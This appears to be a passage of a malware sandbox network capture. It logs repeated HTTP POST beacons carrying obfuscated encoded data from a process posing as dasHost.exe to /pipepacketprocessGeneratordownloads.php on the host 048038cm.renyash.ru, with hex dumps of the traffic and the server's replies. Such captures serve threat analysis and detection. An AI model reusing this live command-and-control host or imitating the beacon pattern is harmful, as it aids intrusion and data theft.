                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10845&min_rtt=1677&rtt_var=10713&sent=889&recv=945&lost=0&retrans=2&sent_bytes=141046&recv_bytes=560436&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 3c 24 39 02 20 28 30 1c 24 02 32 15 3e 3d 2d 11 2a 09 3f 41 3d 16 30 09 25 01 38 5b 28 16 00 42 24 2f 39 0e 21 2e 38 54 3c 10 21 46 04 1e 22 01 20 3e 3c 5b 29 1d 03 53 3d 5a 24 5a 36 20 21 1a 24 3a 25 52 27 2b 3f 55 36 02 0d 1e 27 2f 27 50 2d 27 35 06 3a 30 21 56 31 3e 2c 5e 0e 12 39 18 26 0e 29 5b 28 01 21 58 27 20 19 50 25 05 2d 1f 33 2b 0d 51 37 5e 2d 16 3c 30 3c 0b 26 2f 01 0d 2c 3b 0d 58 33 07 34 55 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<$9 (0$2>=-*?A=0%8[(B$/9!.8T<!F" ><[)S=Z$Z6 !$:%R'+?U6'/'P-'5:0!V1>,^9&)[(!X' P%-3+Q7^-<0<&/,;X34U=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:41.410557985 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:41.743081093 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:42.270488024 CET    967    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJdJtAqB8%2FxvhL3Hb69WdIpPj6xHIrAz8kngNjhFG5cjJdVT7LhKDz0ezD70lKmM8DMCJHjtfQ1R70zasZxegb6MzVZY36kA4ZIN7oyc37Ksu258hO9crY1bsFeKX7kL%2Ft%2B2HUOW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940be3e8d642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10864&min_rtt=1677&rtt_var=10044&sent=894&recv=950&lost=0&retrans=2&sent_bytes=142040&recv_bytes=562842&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 28 1d 35 02 37 05 2c 54 24 12 08 16 3d 13 0b 13 29 23 3f 09 29 06 2b 1c 32 38 2f 00 3c 16 2e 45 33 11 29 0c 21 3d 28 1f 2a 3a 21 46 04 1e 21 5d 20 00 0e 58 29 0d 2e 0a 29 5a 24 17 22 1e 1b 5f 24 29 21 56 32 01 30 0e 22 02 0e 0f 27 05 33 19 2d 37 36 19 39 1e 31 10 25 14 2c 5e 0e 12 39 53 25 56 3d 10 3c 28 3d 12 24 33 3c 0c 26 5d 25 5a 24 3b 30 0f 34 06 0b 1b 2b 23 27 54 24 2c 3f 0e 2d 02 3c 05 24 07 06 1d 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U(57,T$=)#?)+28/<.E3)!=(*:!F!] X).)Z$"_$)!V20"'3-7691%,^9S%V=<(=$3<&]%Z$;04+#'T$,?-<$+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:42.271317959 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:42.604046106 CET    25    IN    HTTP/1.1 100 Continue


                                                                        Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                        1             192.168.2.4    49735          104.21.38.84      80                  8628    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                        Dec 28, 2024 20:42:32.906918049 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:33.251089096 CET    2584    OUT    Data Raw: 53 50 59 54 53 41 55 5c 5d 5f 52 56 5a 50 58 59 57 5f 5f 5f 54 5c 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYTSAU\]_RVZPXYW___T\UFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'??-"+Y4-(+]!="X)7:0>-_#Z"#,*<%\ ![(
                                                                        Dec 28, 2024 20:42:34.131967068 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:34.385126114 CET    813    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SS%2F00SiR5YDi7k30OpE%2BoIL1rAE7npxue02qOyQlXVMiGGePGjutyVFjSP2hmiQyO8iYCoJjopO4wS20qYdADlGZAFYhFh%2FlQdwX06msnJFxWHAu7jcU%2FYkwkaVl%2FKsK7%2F22m3q"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408c658184310-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=30245&min_rtt=26584&rtt_var=17291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=26130&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                        2             192.168.2.4    49737          104.21.38.84      80                  8628    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                        Dec 28, 2024 20:42:35.438139915 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:35.798444986 CET    2584    OUT    Data Raw: 56 56 5c 51 53 45 50 5a 5d 5f 52 56 5a 5b 58 5f 57 59 5f 58 54 54 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VV\QSEPZ]_RVZ[X_WY_XTTUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X?-5;74,Y;#4>*Y== 7+),$,)(50(<%\ ![(+
                                                                        Dec 28, 2024 20:42:36.512321949 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:36.755856037 CET    808    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zusnOVgYl04JXKErSGTzl6338HDp6zpQY%2FXROTv8GLgOd3Mw7TEFPFbrRtgWDKRn9PCbvZcx%2BFY%2F%2Fz8TWsWo00uYFI5Hr5DP2NwvR1rA2ieuq1w%2F9HAzFsN6Hwvt9PAPN0u0aqz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d54e81c42c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4505&min_rtt=1472&rtt_var=6619&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=56721&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                        3             192.168.2.4    49739          104.21.38.84      80                  8628    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                        Dec 28, 2024 20:42:37.218085051 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:37.563827038 CET    2584    OUT    Data Raw: 56 5a 5c 53 56 45 50 5c 5d 5f 52 56 5a 51 58 5a 57 5b 5f 5f 54 51 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\SVEP\]_RVZQXZW[__TQUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(<&";#S788,7)-'V#7U=(.9$"V?]>%\ ![(
                                                                        Dec 28, 2024 20:42:38.347980976 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:38.647552013 CET    811    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8jqR9StW%2B%2B32qomjJzKUM70q4aeN8xmIQUzKBc%2FnLGVYqnUahh11F4nWmPi3OXJDdhXEWU%2FaCXm2p8lvnBLWqunYc%2FHrgUH24f4Pa4ACneiOivJU%2BrPvAGG9F2rr9Tk7hshsaFC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e0ae0a424d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2957&min_rtt=1700&rtt_var=3152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=124160&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                        4             192.168.2.4    49743          104.21.38.84      80                  8628    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                        Dec 28, 2024 20:42:45.062094927 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:45.407532930 CET    2584    OUT    Data Raw: 56 5a 59 55 53 44 50 5c 5d 5f 52 56 5a 5b 58 5e 57 5e 5f 51 54 5c 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYUSDP\]_RVZ[X^W^_QT\UDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+=5,Z"5 /+$7]*.$#_#)?-?6 ?*%\ ![(+
                                                                        Dec 28, 2024 20:42:46.242917061 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:46.497098923 CET    807    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnPkfE%2BpilowflNRPCShMMKjywWXJxnQ7f2VhdKGULchZnmQclfSCRXbpMZSJuYQBOK7E%2FlbQJgbSQ1OaJMQ06aIkLmzS2tfZiTwMlBSm%2BSq7rJ7OI2B0vgy5naf9yfk75Ca9%2BqK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94091208804391-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8341&min_rtt=1743&rtt_var=13849&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=26775&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                        5             192.168.2.4    49744          104.21.38.84      80                  8628    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                        Dec 28, 2024 20:42:46.899283886 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:47.254412889 CET  2584  OUT  Data Raw: 56 55 59 55 56 47 55 5f 5d 5f 52 56 5a 50 58 55 57 58 5f 5c 54 5d 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYUVGU_]_RVZPXUWX_\T]UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y?-^58_#5X-8/X7>=Q ,(?,:3["V'[=%\ ![(
                                                                        Dec 28, 2024 20:42:48.030553102 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:48.271955967 CET  806  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHBo7TUv9P%2BEjGzivehmc8vHE%2FC4QoJ4kj7h6kg7%2FhDM%2Fwji2bcJkWyyeswolZiZxgS0uYGyIQyau1xgepRqOia9bv0m0EZZmdiWp3IBlCQc8Q6YgcMPlycA9TKodTQ7AVfR60zL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94091d3c5f0ca4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4341&min_rtt=1564&rtt_var=6142&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=61380&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        6           192.168.2.4  49745        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:42:48.870582104 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:49.236679077 CET  2584  OUT  Data Raw: 53 57 59 56 53 42 50 5c 5d 5f 52 56 5a 5e 58 5a 57 5c 5f 5f 54 51 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SWYVSBP\]_RVZ^XZW\__TQUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(,.5 ^##,/[#-)=3 *()?,986 ;\*%\ ![(?
                                                                        Dec 28, 2024 20:42:50.096729040 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:50.243901968 CET  809  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OgZVsHLjpez2CwMfat7t8oygmoorIA6bOWJ9Hvu%2BOa%2F995sXyVYF0WRmtIgXNyRjkcvqB8Ra%2BCW4i104AMp7nJe6YUzT%2F1s9Sf85ymA%2BkEa0f69f1Gu1JB4Jo0UdlCNz1IbYrjG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409299c0cc360-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8017&min_rtt=1706&rtt_var=13261&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=27972&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        7           192.168.2.4  49746        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:42:51.176445961 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:51.532787085 CET  2584  OUT  Data Raw: 56 50 59 50 53 42 50 5b 5d 5f 52 56 5a 5a 58 5c 57 58 5f 5c 54 50 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYPSBP[]_RVZZX\WX_\TPUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(,9!^7&+8(74>>/P#*+><:#3'\),%\ ![(/
                                                                        Dec 28, 2024 20:42:52.354885101 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:52.642426014 CET  808  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aK3bTZqPlKlK2sEQIGZcJ%2Fvxt%2FNtm85U46hcpsNm6vB2H0ui5zaFP1nhKLT%2B8VGhzOWiZFLq1k1OSO7XWIVd2rmga01Wnz38Aov1hLt%2FfNhK%2FyCgjWcvqRdikSOjH9yloowe9MTP"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409383cb872aa-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4397&min_rtt=2003&rtt_var=5539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=69011&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        8           192.168.2.4  49748        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        Dec 28, 2024 20:42:53.772964001 CET  306  OUT  POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:54.169359922 CET  2584  OUT  Data Raw: 56 5b 5c 53 53 43 50 59 5d 5f 52 56 5a 59 58 5d 57 5f 5f 5b 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\SSCPY]_RVZYX]W__[TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$<%\6, ';3#&*- 'U>?(::7[5_*<%\ ![(#
                                                                        Dec 28, 2024 20:42:54.949637890 CET  25  IN  HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:55.205137014 CET  804  IN  HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65b5yeWlJy9KgMfCDh2t7viV4tGhYK5d5sh27GKFgCN3KGCbBfSw4QQX1TxA8FnFHYrk1d9%2FKqGwvPFNfTu45Y6WLoX15UVbGHUn5FPEtIgZBS36cdpxTzJhJ0S0%2BpF2Hx%2BLYL9r"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409486af15e68-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3965&min_rtt=1676&rtt_var=5207&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=73029&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        9           192.168.2.4  49749        104.21.38.84    80                8628  C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
